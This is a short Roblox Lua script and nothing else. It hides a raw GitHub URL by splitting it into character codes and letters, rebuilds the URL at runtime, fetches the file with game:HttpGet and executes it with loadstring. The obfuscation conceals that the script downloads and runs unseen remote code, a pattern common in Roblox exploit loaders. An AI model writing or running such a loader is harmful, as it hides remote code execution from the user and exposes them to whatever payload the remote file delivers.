local parts = {104, "t", 116, "p", 115, ":", 47, 47, "r", 97, "w", 46, "g", 105, "t", 104, "u", 98, "u", 115, "e", 114, "c", 111, 110, "t", 101, 110, "t", 46, "c", 111, "m", 47, "S", 65, "M", 85, "C", 65, "R", 65, "R", 79, "N", 79, "B", 47, "I", 110, "f", 47, "r", 101, "f", 115, 47, "h", 101, 97, 100, 115, 47, "m", 97, "i", 110, 47, "9", "3", "9", "3", "9"}

local function assembleURL(parts)
    local url = ""
    for _, part in ipairs(parts) do
        url = url .. (type(part) == "string" and part or string.char(part))
    end
    return url
end

loadstring(game:HttpGet(assembleURL(parts)))()
